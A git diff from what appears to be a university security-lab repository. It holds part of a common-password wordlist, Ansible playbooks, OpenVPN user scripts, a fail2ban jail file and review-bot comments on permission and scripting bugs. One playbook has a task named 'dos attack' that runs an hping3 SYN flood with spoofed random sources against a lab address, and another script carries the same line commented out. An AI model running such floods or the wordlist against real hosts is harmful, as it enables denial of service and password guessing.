+yolanda +yomama 
+yvette +zachary +zack +zebras +zepplin +zoltan +zoomer +zxc +zxcvbn +!@#$%^& +00000000 +121212 +1234qwer +123go +131313 +13579 +1701d +21122112 +369 +5555 +80486 +90210 +911 +99999999 +@#$%^& +ABC123 +Abcdef +Asdfgh +Casio +Changeme +FuckYou +Fuckyou +Gizmo +Hello +JSBach +Michel +NCC1701 +PPP +Qwert +Qwerty +Windows +Zxcvb +Zxcvbnm +action +advil +allo +amelie +anaconda +angus +apollo13 +artist +aspen +ass +asshole +ath +benoit +bernard +bernie +bigbird +bird +blizzard +bluesky +bonjour +booster +byteme +caesar +cardinal +carolina +cats +cedic +cesar +chandler +changeit +chapman +charlie1 +chevy +chiquita +chocolat +christia +christoph +classroom +cloclo +coco +corrado +cougars +courtney +dasha +demo +dirk +dolphins +dominic +donkey +doom2 +dusty +e +energy +fearless +fiction +forest +french1 +fubar +gator +gilles +glenn +go +gocougs +good-luck +graymail +guinness +hilbert +hola +home +homebrew +hotdog +indian +jared +jimbo +jkm +johnson +jojo +josie +judy +koko +kristin +lloyd +lorraine +lulu +lynn +m1911a1 +mac +macintosh +mailer +mars +maxime +memory +meow +mimi +mirror +nat +ne1410s +ne1469 +ne14a69 +nebraska +nemesis +network +newcourt +nigel +niki +nite +notused +oatmeal +patton +paul +pedro +planet +players +politics +pomme +portland +praise +property +protel +psalms +qwaszx +raiders +rambo1 +rancid +ruth +sales +salut +scrooge +shawn +shelley +skidoo +softball +spain +speedo +sports +sss +ssssss +steele +steph +stephani +sunday +surf +sylvie +symbol +tiffany +tigre +toronto +trixie +undead +valentin +velvet +viking +walker +watson +young +zhongguo diff --git a/backup_files/run.sh b/backup_files/run.sh new file mode 100755 index 0000000..68a4f91 --- /dev/null +++ b/backup_files/run.sh @@ -0,0 +1,2 @@ +ansible-playbook -u docker -i inventory.yml test.yml -f 5 --ask-pass --ask-become-pass + diff --git a/backup_files/script_update.sh b/backup_files/script_update.sh new file mode 100755 index 0000000..ac263c5 --- /dev/null +++ b/backup_files/script_update.sh 
@@ -0,0 +1,8 @@
+#!/bin/sh
+
+
+sudo apt-get update -y # To get the latest package lists
+#sudo apt install hping3 -y
+#hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.25.0.2
+
+
diff --git a/backup_files/second_script.sh b/backup_files/second_script.sh
new file mode 100755
index 0000000..655a74c
--- /dev/null
+++ b/backup_files/second_script.sh
@@ -0,0 +1,2 @@
+ansible-playbook -u docker -i inventory_w.yml test2.yml -f 4 --ask-pass --ask-become-pass
+
diff --git a/backup_files/test.retry b/backup_files/test.retry
new file mode 100644
index 0000000..75048d0
--- /dev/null
+++ b/backup_files/test.retry
@@ -0,0 +1,5 @@
+172.27.0.2
+172.27.0.3
+172.27.0.4
+172.27.0.5
+172.27.0.6
diff --git a/backup_files/test.yml b/backup_files/test.yml
new file mode 100644
index 0000000..4a6c212
--- /dev/null
+++ b/backup_files/test.yml
@@ -0,0 +1,112 @@
+---
+- hosts: service
+ remote_user: docker
+ gather_facts: no
+ vars:
+ user: "docker"
+
+
+
+ tasks:
+
+
+
+ # make directory
+
+ - name: make dir for data
+ become: true
+ file:
+ path: "/var/lab/playground/playground-readmongo"
+ state: directory
+ owner: docker
+ group: docker
+ mode: '0777'
+
+ # make another directory
+
+# - name: make another dir for data
+# become: true
+# file:
+# path: "/home/docker/my_dir"
+# state: directory
+# owner: docker
+# group: docker
+# mode: '0777'
+
+
+ # pare google.com
+
+# - name: google.com
+# become: yes
+# become_user: "{{ user }}"
+# command: curl http://www.google.com
+# ignore_errors: yes
+# register: configwww
+
+# - name: ls configwww
+# debug: var=configwww.stdout_lines
+
+
+ # mk dir
+
+# - name: remove dir
+# become: yes
+# become_user: "{{ user }}"
+# command: rmdir new_dir
+# ignore_errors: yes
+# register: rmvdir
+
+
+# - name: ls rmvdir
+# debug: var=rmvdir.stdout_lines
+
+
+
+
+ # ls -al
+
+ - name: ls -al
+ become: yes
+ become_user: "{{ user }}"
+ command: ls -al #/etc
+ ignore_errors: yes
+ register: config
+
+
+ - name: ls config
+ debug: var=config.stdout_lines
+
+
+
+ # netstat -antlupe
+
+# - name: netstat
+# become: yes
+# become_user: "{{ user }}"
+# command: netstat -antlupe
+# ignore_errors: yes
+# register: ant
+
+
+
+# - name: ls ant
+# debug: var=ant.stdout_lines
+
+ # install hping3 to all
+
+# - name: install hping3 to all
+# become: yes
+# become_user: "{{ user }}"
+# command: sudo apt install hping3 -y
+# ignore_errors: yes
+# register: install_hp3
+
+# - name: ls install_hp3
+# debug: var=install_hp3.stdout_lines
+
+
+
+ - name: Refresh connection
+ meta: clear_host_errors
+
+
diff --git a/backup_files/test2.retry b/backup_files/test2.retry
new file mode 100644
index 0000000..db790ad
--- /dev/null
+++ b/backup_files/test2.retry
@@ -0,0 +1,4 @@
+172.27.0.3
+172.27.0.4
+172.27.0.5
+172.27.0.6
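Review bot: The `make dir for data` task in backup_files/test.yml creates `/var/lab/playground/playground-readmongo` with `mode: '0777'`, so every local account can create, replace or delete files in a data directory that is already owned by `docker:docker`. Since owner and group are set explicitly, `mode: '0755'` (or `'0750'` if only the docker group needs to read it) gives the service the same access without the world-write bit. The `ls -al` task also sets `ignore_errors: yes`, so a failed command still reaches the `ls config` debug task and the run reports success; dropping that line would make a broken host visible.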
diff --git a/backup_files/test2.yml b/backup_files/test2.yml
new file mode 100644
index 0000000..11e6305
--- /dev/null
+++ b/backup_files/test2.yml
@@ -0,0 +1,48 @@
+---
+- hosts: service
+ remote_user: docker
+ sudo: yes
+ gather_facts: no
+ vars:
+ user: "docker"
+
+ tasks:
+
+
+ # ls -al test
+
+# - name: ls -al
+# become: yes
+# become_user: "{{ user }}"
+# command: ls -al
+# ignore_errors: yes
+# register: config
+
+# - name: ls config
+# debug: var=config.stdout_lines
+
+
+ # transfer script
+
+ - name: Transfer script.
+ copy: src=script_update.sh dest=/home/docker mode=0777
+
+ # exec script
+ - name: Exec script_update.
+ command: sh /home/docker/script_update.sh
+
+
+ # install hping3
+ - name: Ansible apt install hping3.
+ become: true
+ apt:
+ name: hping3
+ state: present
+ update_cache: true
+
+
+ # refresh
+ - name: Refresh connection
+ meta: clear_host_errors
+
+
diff --git a/backup_files/test3.retry b/backup_files/test3.retry
new file mode 100644
index 0000000..f23db12
--- /dev/null
+++ b/backup_files/test3.retry
@@ -0,0 +1,4 @@
+172.29.0.3
+172.29.0.4
+172.29.0.5
+172.29.0.6
diff --git a/backup_files/test3.yml b/backup_files/test3.yml
new file mode 100644
index 0000000..c4492c5
--- /dev/null
+++ b/backup_files/test3.yml
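Review bot: In backup_files/test2.yml the `Transfer script.` task installs script_update.sh with `mode=0777`, and the next task runs it in a play that requests privilege escalation, so any local account on the target can rewrite the script before it is executed with elevated rights. The script only needs to be readable and executable: `copy: src=script_update.sh dest=/home/docker/script_update.sh mode=0755`. The play-level `sudo: yes` keyword was replaced by `become: yes`, and current Ansible releases no longer accept it, so the play should use `become: yes` instead; the same applies to test3.yml.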
@@ -0,0 +1,60 @@
+---
+- hosts: service
+ remote_user: docker
+ sudo: yes
+ gather_facts: no
+ vars:
+ user: "docker"
+
+
+
+ tasks:
+
+
+
+
+ # ls -al
+
+# - name: ls -al
+# become: yes
+# become_user: "{{ user }}"
+# command: ls -al
+# ignore_errors: yes
+# register: config2
+
+
+# - name: ls config2
+# debug: var=config2.stdout_lines
+
+ # dos attack async
+ - name: dos attack
+ command: sudo hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.21.0.2 -y
+ async: 120
+ poll: 0
+
+
+
+
+ # ls -al
+
+# - name: ls -al
+# become: yes
+# become_user: "{{ user }}"
+# command: ls -al
+# ignore_errors: yes
+# register: config3
+
+
+ - name: ls config3
+ debug: var=config3.stdout_lines
+
+
+
+
+
+
+
+ - name: Refresh connection
+ meta: clear_host_errors
+
+
diff --git a/backup_files/vpn+backup/cr_vi_sec_vpn_my5.sh b/backup_files/vpn+backup/cr_vi_sec_vpn_my5.sh
new file mode 100755
index 0000000..059cbc2
--- /dev/null
+++ b/backup_files/vpn+backup/cr_vi_sec_vpn_my5.sh
@@ -0,0 +1,26 @@
+#!/bin/bash
+for i in {1..5}
+do
+#create user
+
+NUM=$i
+USERNAME=sec_vpn_$NUM
+vpn_data=$PWD/openvpn-services/
+docker=registry.vlabs.uniwa.gr:5080/myownvpn
+
+docker run -v $vpn_data:/etc/openvpn --rm -it $docker easyrsa build-client-full $USERNAME nopass
+docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm $docker ovpn_getclient $USERNAME > $USERNAME.ovpn
+
+#change file of user ----if needed change ip in here----
+NAME=sec_vpn_$NUM.ovpn
+sudo sed -i '5,7d' ./$NAME
+sudo sed -i '4 a comp-lzo' ./$NAME
+sudo sed -i '5 a resolv-retry infinite' ./$NAME
+sudo sed -i '6 a keepalive 15 60' ./$NAME
+sudo sed -i '7 a remote-cert-tls server' ./$NAME
+sudo sed -i '8 a remote 192.168.1.5 1194 udp' ./$NAME
+sudo sed -i '9 a float' ./$NAME
+done
+
+cp sec_vpn_* ../test/project/
+
diff --git a/backup_files/vpn+backup/create-user.sh b/backup_files/vpn+backup/create-user.sh
new file mode 100755
index 0000000..25652b5
--- /dev/null
+++ b/backup_files/vpn+backup/create-user.sh
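Review bot: In backup_files/test3.yml the `ls config3` debug task reads `config3.stdout_lines`, but the only task that registers `config3` is commented out directly above it, so the variable is undefined when the debug runs; restore the registering task or remove the debug. The `dos attack` task hard-codes its destination and is launched with `async: 120` / `poll: 0`, so nothing checks where the traffic goes or whether the command succeeded. For a lab exercise the address should come from a play variable, and the play should first `assert` that it lies inside the lab subnet, so a stale value or the wrong inventory cannot direct the traffic outside the test network. Privilege escalation belongs in `become: true` on the task rather than `sudo` inside `command`.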
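Review bot: cr_vi_sec_vpn_my5.sh generates every client key with `nopass` and then runs `cp sec_vpn_* ../test/project/`, so profiles holding unencrypted private keys are written with the default umask and duplicated into the project tree, where they can easily end up in an image or a commit. At minimum put `umask 077` before the loop and copy only to a location that is excluded from version control and from the Docker build context; dropping `nopass` is the stronger option if the lab can tolerate a passphrase prompt. The `sed -i` edits address the profile by fixed line numbers (`'5,7d'`, `'4 a …'`), which silently produces a wrong file if the generated profile layout changes, and `$vpn_data` / `$USERNAME` are unquoted, so a working directory containing a space breaks the `docker run -v` arguments. create-user.sh has the same `nopass` and quoting pattern.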
@@ -0,0 +1,6 @@
+USERNAME=sec2
+vpn_data=$PWD/openvpn-services/
+docker=registry.vlabs.uniwa.gr:5080/myownvpn
+
+docker run -v $vpn_data:/etc/openvpn --rm -it $docker easyrsa build-client-full $USERNAME nopass
+docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm $docker ovpn_getclient $USERNAME > $USERNAME.ovpn
diff --git a/backup_files/vpn+backup/create-vpn.sh b/backup_files/vpn+backup/create-vpn.sh
new file mode 100755
index 0000000..7409fd7
--- /dev/null
+++ b/backup_files/vpn+backup/create-vpn.sh
@@ -0,0 +1,47 @@
+#!/bin/bash
+IP=127.0.0.1 # Server IP
+P=1194 # Server Port
+OVPN_SERVER='10.80.0.0/16' # VPN Network
+
+#vpn_data=/var/lib/swarmlab/openvpn/openvpn-services/ # Dir to save data ** this must exist **
+vpn_data=$PWD/openvpn-services/
+if [ ! -d $vpn_data ]; then
+ mkdir -p $vpn_data
+fi
+
+NAME=swarmlab-vpn-services # name of docker service
+DOCKERnetwork=swarmlab-vpn-services-network # docker network
+docker=registry.vlabs.uniwa.gr:5080/myownvpn # docker image
+
+docker stop $NAME #stop container
+sleep 1
+docker container rm $NAME #rm container
+
+# rm config files
+rm -f $vpn_data/openvpn.conf.*.bak
+rm -f $vpn_data/openvpn.conf
+rm -f $vpn_data/ovpn_env.sh.*.bak
+rm -f $vpn_data/ovpn_env.sh
+
+# create network
+sleep 1
+docker network create --attachable=true --driver=bridge --subnet=172.50.0.0/16 --gateway=172.50.0.1 $DOCKERnetwork
+
+#run container see ovpn_genconfig
+docker run --net=none -it -v $vpn_data:/etc/openvpn -p 1194:1194 --rm $docker ovpn_genconfig -u udp://$IP:1194 \
+-N -d -c -p "route 172.50.20.0 255.255.255.0" -e "topology subnet" -s $OVPN_SERVER
+
+# create pki see ovpn_initpki
+docker run --net=none -v $vpn_data:/etc/openvpn --rm -it $docker ovpn_initpki
+
+# see ovpn_copy_server_files
+#docker run --net=none -v $vpn_data:/etc/openvpn --rm $docker ovpn_copy_server_files
+
+#create vpn see --cap-add=NET_ADMIN
+sleep 1
+docker run --detach --name $NAME -v $vpn_data:/etc/openvpn --net=$DOCKERnetwork --ip=172.50.0.2 -p $P:1194/udp --cap-add=NET_ADMIN $docker
+
+sudo sysctl -w net.ipv4.ip_forward=1
+
+#show created
+docker ps
diff --git a/backup_files/vpn+backup/rm-user.sh b/backup_files/vpn+backup/rm-user.sh
new file mode 100755
index 0000000..8dccdae
--- /dev/null
+++ b/backup_files/vpn+backup/rm-user.sh
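Review bot: The `docker network create` line in create-vpn.sh uses `--subnet=172.50.0.0/16`, and the pushed route is `172.50.20.0 255.255.255.0`; both lie outside the private block 172.16.0.0/12, which ends at 172.31.255.255. The Docker host therefore routes a publicly assigned /16 into the bridge, and every VPN client sends the pushed /24 through the tunnel, which shadows whatever real hosts use those addresses. Choose a range inside private space and change the gateway, `--ip=` and push route to match, for example (constructed value) `--subnet=172.30.0.0/16 --gateway=172.30.0.1`. Separately, `$vpn_data` is unquoted in the `[ ! -d $vpn_data ]` test and in the four `rm -f` lines, and the image is referenced without a tag or digest, so a rebuild can pull different contents than the one tested.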
@@ -0,0 +1,22 @@
+#!/bin/bash
+
+CLIENTNAME=sec_vpn_
+U=$CLIENTNAME
+
+vpn_data=$PWD/openvpn-services/
+docker=registry.vlabs.uniwa.gr:5080/myownvpn
+
+rm -f $vpn_data/pki/reqs/$CLIENTNAME.req
+rm -f $vpn_data/pki/private/$CLIENTNAME.key
+rm -f $vpn_data/pki/issued/$CLIENTNAME.crt
+rm -f $vpn_data/server/ccd/$CLIENTNAME
+rm -f $vpn_data/ccd/$CLIENTNAME
+pem=$(sudo grep "CN=$U$" $vpn_data/pki/index.txt | cut -f4)
+
+rm -f $vpn_data/pki/certs_by_serial/$pem.pem
+sed -i "/CN=$U$/d" $vpn_data/pki/index.txt
+echo $pem
+docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm -it $docker ovpn_revokeclient $CLIENTNAME remove
+
+rm -f $vpn_data_user_config/$CLIENTNAME.ovpn
+rm -f $vpn_data_user_config1/$CLIENTNAME.ovpn
diff --git a/backup_files/vpn+backup/rm_my5.sh b/backup_files/vpn+backup/rm_my5.sh
new file mode 100755
index 0000000..3c3ec14
--- /dev/null
+++ b/backup_files/vpn+backup/rm_my5.sh
@@ -0,0 +1,30 @@
+#!/bin/bash
+for i in {1..5}
+do
+#delete my 5
+
+NUM=$i
+CLIENTNAME=sec_vpn_$NUM
+U=$CLIENTNAME
+
+vpn_data=$PWD/openvpn-services/
+docker=registry.vlabs.uniwa.gr:5080/myownvpn
+
+rm -f $vpn_data/pki/reqs/$CLIENTNAME.req
+rm -f $vpn_data/pki/private/$CLIENTNAME.key
+rm -f $vpn_data/pki/issued/$CLIENTNAME.crt
+rm -f $vpn_data/server/ccd/$CLIENTNAME
+rm -f $vpn_data/ccd/$CLIENTNAME
+pem=$(sudo grep "CN=$U$" $vpn_data/pki/index.txt | cut -f4)
+
+rm -f $vpn_data/pki/certs_by_serial/$pem.pem
+sed -i "/CN=$U$/d" $vpn_data/pki/index.txt
+echo $pem
+docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm -it $docker ovpn_revokeclient $CLIENTNAME remove
+
+rm -f $vpn_data_user_config/$CLIENTNAME.ovpn
+rm -f $vpn_data_user_config1/$CLIENTNAME.ovpn
+
+#rm file from myfile
+sudo rm ./$CLIENTNAME.ovpn
+done
diff --git a/backup_files/vpn+backup/show-conn-user.sh b/backup_files/vpn+backup/show-conn-user.sh
new file mode 100755
index 0000000..5e20b50
--- /dev/null
+++ b/backup_files/vpn+backup/show-conn-user.sh
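Review bot: rm-user.sh deletes the client's request, key and issued certificate and strips its `index.txt` entry before it calls `ovpn_revokeclient $CLIENTNAME remove`. If that helper revokes through easy-rsa, as the upstream docker-openvpn script of the same name does (to be confirmed for this image), it can no longer find the certificate, nothing is added to the CRL, and any copy of the .ovpn profile still authenticates. Let the helper perform both revocation and removal, and drop the manual `rm -f` / `sed -i` lines that precede it. `$vpn_data_user_config` and `$vpn_data_user_config1` are never assigned, so the last two `rm -f` lines expand to `/$CLIENTNAME.ovpn` at the filesystem root; an empty `$pem` likewise turns the `certs_by_serial` removal into `.pem`. rm_my5.sh repeats the same ordering and the same unset variables.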
@@ -0,0 +1,2 @@
+NAME=swarmlab-vpn-services # name of docker service
+docker exec -it $NAME ovpn_listclients
diff --git a/backup_files/vpn+backup/show-user.sh b/backup_files/vpn+backup/show-user.sh
new file mode 100755
index 0000000..5e20b50
--- /dev/null
+++ b/backup_files/vpn+backup/show-user.sh
@@ -0,0 +1,2 @@
+NAME=swarmlab-vpn-services # name of docker service
+docker exec -it $NAME ovpn_listclients
diff --git a/backup_files/vpn+backup/vi-userfile.sh b/backup_files/vpn+backup/vi-userfile.sh
new file mode 100755
index 0000000..efe2f59
--- /dev/null
+++ b/backup_files/vpn+backup/vi-userfile.sh
@@ -0,0 +1,16 @@
+#!/bin/bash
+for j in {1..5}
+do
+NAME=sec_vpn_$j.ovpn
+sudo sed -i '5,7d' /home/zoiros13/swarmlab-sec/vpn/$NAME
+sudo sed -i '4 a comp-lzo' /home/zoiros13/swarmlab-sec/vpn/$NAME
+sudo sed -i '5 a resolv-retry infinite' /home/zoiros13/swarmlab-sec/vpn/$NAME
+sudo sed -i '6 a keepalive 15 60' /home/zoiros13/swarmlab-sec/vpn/$NAME
+sudo sed -i '7 a remote-cert-tls server' /home/zoiros13/swarmlab-sec/vpn/$NAME
+sudo sed -i '8 a remote 192.168.1.5 1194 udp' /home/zoiros13/swarmlab-sec/vpn/$NAME
+sudo sed -i '9 a float' /home/zoiros13/swarmlab-sec/vpn/$NAME
+done
+
+
+
+
diff --git a/backup_files/workingjail.local b/backup_files/workingjail.local
new file mode 100644
index 0000000..9663f0f
--- /dev/null
+++ b/backup_files/workingjail.local
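Review bot: In vi-userfile.sh the `sed -i '5,7d'` and `sed -i 'N a ...'` edits address the profile by line number, so the script is only correct for one exact input layout; a second run deletes the `comp-lzo`, `resolv-retry` and `keepalive` lines it inserted and leaves duplicate `remote-cert-tls`, `remote` and `float` lines. Matching on content is safer, e.g. `sed -i 's/^remote .*/remote 192.168.1.5 1194 udp/' "$f"`, with the profile directory passed as an argument instead of the hard-coded `/home/zoiros13/swarmlab-sec/vpn/`. `comp-lzo` is added on the client side only; OpenVPN has deprecated compression, so I would leave it out unless the server configuration requires it.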
@@ -0,0 +1,899 @@ +# +# WARNING: heavily refactored in 0.9.0 release. Please review and +# customize settings for your setup. +# +# Changes: in most of the cases you should not modify this +# file, but provide customizations in jail.local file, +# or separate .conf files under jail.d/ directory, e.g.: +# +# HOW TO ACTIVATE JAILS: +# +# YOU SHOULD NOT MODIFY THIS FILE. +# +# It will probably be overwritten or improved in a distribution update. +# +# Provide customizations in a jail.local file or a jail.d/customisation.local. +# For example to change the default bantime for all jails and to enable the +# ssh-iptables jail the following (uncommented) would appear in the .local file. +# See man 5 jail.conf for details. +# +# [DEFAULT] +# bantime = 1h +# +# [sshd] +# enabled = true +# +# See jail.conf(5) man page for more information + + + +# Comments: use '#' for comment lines and ';' (following a space) for inline comments + + +[INCLUDES] + +#before = paths-distro.conf +before = paths-debian.conf + +# The DEFAULT allows a global definition of the options. They can be overridden +# in each jail afterwards. + +[DEFAULT] + +# +# MISCELLANEOUS OPTIONS +# + +# "ignorself" specifies whether the local resp. own IP addresses should be ignored +# (default is true). Fail2ban will not ban a host which matches such addresses. +#ignorself = true + +# "ignoreip" can be a list of IP addresses, CIDR masks or DNS hosts. Fail2ban +# will not ban a host which matches an address in this list. Several addresses +# can be defined using space (and/or comma) separator. +#ignoreip = 127.0.0.1/8 ::1 + +# External command that will take an tagged arguments to ignore, e.g. , +# and return true if the IP is to be ignored. False otherwise. +# +# ignorecommand = /path/to/command +ignorecommand = + +# "bantime" is the number of seconds that a host is banned. +bantime = 600 + +# A host is banned if it has generated "maxretry" during the last "findtime" +# seconds. 
+findtime = 30 + +# "maxretry" is the number of failures before a host get banned. +maxretry = 5 + +# "backend" specifies the backend used to get files modification. +# Available options are "pyinotify", "gamin", "polling", "systemd" and "auto". +# This option can be overridden in each jail as well. +# +# pyinotify: requires pyinotify (a file alteration monitor) to be installed. +# If pyinotify is not installed, Fail2ban will use auto. +# gamin: requires Gamin (a file alteration monitor) to be installed. +# If Gamin is not installed, Fail2ban will use auto. +# polling: uses a polling algorithm which does not require external libraries. +# systemd: uses systemd python library to access the systemd journal. +# Specifying "logpath" is not valid for this backend. +# See "journalmatch" in the jails associated filter config +# auto: will try to use the following backends, in order: +# pyinotify, gamin, polling. +# +# Note: if systemd backend is chosen as the default but you enable a jail +# for which logs are present only in its own log files, specify some other +# backend for that jail (e.g. polling) and provide empty value for +# journalmatch. See https://github.com/fail2ban/fail2ban/issues/959#issuecomment-74901200 +backend = auto + +# "usedns" specifies if jails should trust hostnames in logs, +# warn when DNS lookups are performed, or ignore all hostnames in logs +# +# yes: if a hostname is encountered, a DNS lookup will be performed. +# warn: if a hostname is encountered, a DNS lookup will be performed, +# but it will be logged as a warning. +# no: if a hostname is encountered, will not be used for banning, +# but it will be logged as info. +# raw: use raw value (no hostname), allow use it for no-host filters/actions (example user) +usedns = warn + +# "logencoding" specifies the encoding of the log files handled by the jail +# This is used to decode the lines from the log file. 
+# Typical examples: "ascii", "utf-8" +# +# auto: will use the system locale setting +logencoding = auto + +# "enabled" enables the jails. +# By default all jails are disabled, and it should stay this way. +# Enable only relevant to your setup jails in your .local or jail.d/*.conf +# +# true: jail will be enabled and log files will get monitored for changes +# false: jail is not enabled +enabled = false + + +# "mode" defines the mode of the filter (see corresponding filter implementation for more info). +mode = normal + +# "filter" defines the filter to use by the jail. +# By default jails have names matching their filter name +# +filter = %(__name__)s[mode=%(mode)s] + + +# +# ACTIONS +# + +# Some options used for actions + +# Destination email address used solely for the interpolations in +# jail.{conf,local,d/*} configuration files. +destemail = root@localhost + +# Sender email address used solely for some actions +sender = root@ + +# E-mail action. Since 0.8.1 Fail2Ban uses sendmail MTA for the +# mailing. Change mta configuration parameter to mail if you want to +# revert to conventional 'mail'. +mta = sendmail + +# Default protocol +protocol = tcp + +# Specify chain where jumps would need to be added in ban-actions expecting parameter chain +chain = + +# Ports to be banned +# Usually should be overridden in a particular jail +port = 0:65535 + +# Format of user-agent https://tools.ietf.org/html/rfc7231#section-5.5.3 +fail2ban_agent = Fail2Ban/%(fail2ban_version)s + +# +# Action shortcuts. To be used to define action parameter + +# Default banning action (e.g. iptables, iptables-new, +# iptables-multiport, shorewall, etc) It is used to define +# action_* variables. 
Can be overridden globally or per +# section within jail.local file +banaction = iptables-multiport +banaction_allports = iptables-allports + + + + +# The simplest action to take: ban only +#action_ = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"] + +# ban & send an e-mail with whois report to the destemail. +action_mw = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"] + %(mta)s-whois[name=%(__name__)s, sender="%(sender)s", dest="%(destemail)s", protocol="%(protocol)s", chain="%(chain)s"] + +# ban & send an e-mail with whois report and relevant log lines +# to the destemail. +action_mwl = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"] + %(mta)s-whois-lines[name=%(__name__)s, sender="%(sender)s", dest="%(destemail)s", logpath=%(logpath)s, chain="%(chain)s"] + +# See the IMPORTANT note in action.d/xarf-login-attack for when to use this action +# +# ban & send a xarf e-mail to abuse contact of IP address and include relevant log lines +# to the destemail. +action_xarf = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"] + xarf-login-attack[service=%(__name__)s, sender="%(sender)s", logpath=%(logpath)s, port="%(port)s"] + +# ban IP on CloudFlare & send an e-mail with whois report and relevant log lines +# to the destemail. +action_cf_mwl = cloudflare[cfuser="%(cfemail)s", cftoken="%(cfapikey)s"] + %(mta)s-whois-lines[name=%(__name__)s, sender="%(sender)s", dest="%(destemail)s", logpath=%(logpath)s, chain="%(chain)s"] + +# Report block via blocklist.de fail2ban reporting service API +# +# See the IMPORTANT note in action.d/blocklist_de.conf for when to use this action. 
+# Specify expected parameters in file action.d/blocklist_de.local or if the interpolation +# `action_blocklist_de` used for the action, set value of `blocklist_de_apikey` +# in your `jail.local` globally (section [DEFAULT]) or per specific jail section (resp. in +# corresponding jail.d/my-jail.local file). +# +action_blocklist_de = blocklist_de[email="%(sender)s", service=%(filter)s, apikey="%(blocklist_de_apikey)s", agent="%(fail2ban_agent)s"] + +# Report ban via badips.com, and use as blacklist +# +# See BadIPsAction docstring in config/action.d/badips.py for +# documentation for this action. +# +# NOTE: This action relies on banaction being present on start and therefore +# should be last action defined for a jail. +# +action_badips = badips.py[category="%(__name__)s", banaction="%(banaction)s", agent="%(fail2ban_agent)s"] +# +# Report ban via badips.com (uses action.d/badips.conf for reporting only) +# +action_badips_report = badips[category="%(__name__)s", agent="%(fail2ban_agent)s"] + +# Report ban via abuseipdb.com. +# +# See action.d/abuseipdb.conf for usage example and details. +# +action_abuseipdb = abuseipdb + +# Choose default action. To change, just override value of 'action' with the +# interpolation to the chosen action shortcut (e.g. action_mw, action_mwl, etc) in jail.local +# globally (section [DEFAULT]) or per specific section +action = %(action_)s + + +# +# JAILS +# + +# +# SSH servers +# + +[sshd] +enabled = true +maxretry = 3 +bantime = 300 +findtime = 30 +# To use more aggressive sshd modes set filter parameter "mode" in jail.local: +# normal (default), ddos, extra or aggressive (combines all). +# See "tests/files/logs/sshd" or "filter.d/sshd.conf" for usage example and details. 
+#mode = normal +chain= INPUT +port = 22 +logpath = %(sshd_log)s +backend = %(sshd_backend)s +action_ = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"] + + + +[dropbear] + +port = ssh +logpath = %(dropbear_log)s +backend = %(dropbear_backend)s + + +[selinux-ssh] + +port = ssh +logpath = %(auditd_log)s +enabled = true + +# +# HTTP servers +# + +[apache-auth] + +port = http,https +logpath = %(apache_error_log)s + + +[apache-badbots] +# Ban hosts which agent identifies spammer robots crawling the web +# for email addresses. The mail outputs are buffered. +port = http,https +logpath = %(apache_access_log)s +bantime = 48h +maxretry = 1 + + +[apache-noscript] + +port = http,https +logpath = %(apache_error_log)s + + +[apache-overflows] + +port = http,https +logpath = %(apache_error_log)s +maxretry = 2 + + +[apache-nohome] + +port = http,https +logpath = %(apache_error_log)s +maxretry = 2 + + +[apache-botsearch] + +port = http,https +logpath = %(apache_error_log)s +maxretry = 2 + + +[apache-fakegooglebot] + +port = http,https +logpath = %(apache_access_log)s +maxretry = 1 +ignorecommand = %(ignorecommands_dir)s/apache-fakegooglebot + + +[apache-modsecurity] + +port = http,https +logpath = %(apache_error_log)s +maxretry = 2 + + +[apache-shellshock] + +port = http,https +logpath = %(apache_error_log)s +maxretry = 1 + + +[openhab-auth] + +filter = openhab +action = iptables-allports[name=NoAuthFailures] +logpath = /opt/openhab/logs/request.log + + +[nginx-http-auth] + +port = http,https +logpath = %(nginx_error_log)s + +# To use 'nginx-limit-req' jail you should have `ngx_http_limit_req_module` +# and define `limit_req` and `limit_req_zone` as described in nginx documentation +# http://nginx.org/en/docs/http/ngx_http_limit_req_module.html +# or for example see in 'config/filter.d/nginx-limit-req.conf' +[nginx-limit-req] +port = http,https +logpath = %(nginx_error_log)s + +[nginx-botsearch] + +port = 
http,https +logpath = %(nginx_error_log)s +maxretry = 2 + + +# Ban attackers that try to use PHP's URL-fopen() functionality +# through GET/POST variables. - Experimental, with more than a year +# of usage in production environments. + +[php-url-fopen] + +port = http,https +logpath = %(nginx_access_log)s + %(apache_access_log)s + + +[suhosin] + +port = http,https +logpath = %(suhosin_log)s + + +[lighttpd-auth] +# Same as above for Apache's mod_auth +# It catches wrong authentifications +port = http,https +logpath = %(lighttpd_error_log)s + + +# +# Webmail and groupware servers +# + +[roundcube-auth] + +port = http,https +logpath = %(roundcube_errors_log)s +# Use following line in your jail.local if roundcube logs to journal. +#backend = %(syslog_backend)s + + +[openwebmail] + +port = http,https +logpath = /var/log/openwebmail.log + + +[horde] + +port = http,https +logpath = /var/log/horde/horde.log + + +[groupoffice] + +port = http,https +logpath = /home/groupoffice/log/info.log + + +[sogo-auth] +# Monitor SOGo groupware server +# without proxy this would be: +# port = 20000 +port = http,https +logpath = /var/log/sogo/sogo.log + + +[tine20] + +logpath = /var/log/tine20/tine20.log +port = http,https + + +# +# Web Applications +# +# + +[drupal-auth] + +port = http,https +logpath = %(syslog_daemon)s +backend = %(syslog_backend)s + +[guacamole] + +port = http,https +logpath = /var/log/tomcat*/catalina.out + +[monit] +#Ban clients brute-forcing the monit gui login +port = 2812 +logpath = /var/log/monit + + +[webmin-auth] + +port = 10000 +logpath = %(syslog_authpriv)s +backend = %(syslog_backend)s + + +[froxlor-auth] + +port = http,https +logpath = %(syslog_authpriv)s +backend = %(syslog_backend)s + + +# +# HTTP Proxy servers +# +# + +[squid] + +port = 80,443,3128,8080 +logpath = /var/log/squid/access.log + + +[3proxy] + +port = 3128 +logpath = /var/log/3proxy.log + + +# +# FTP servers +# + + 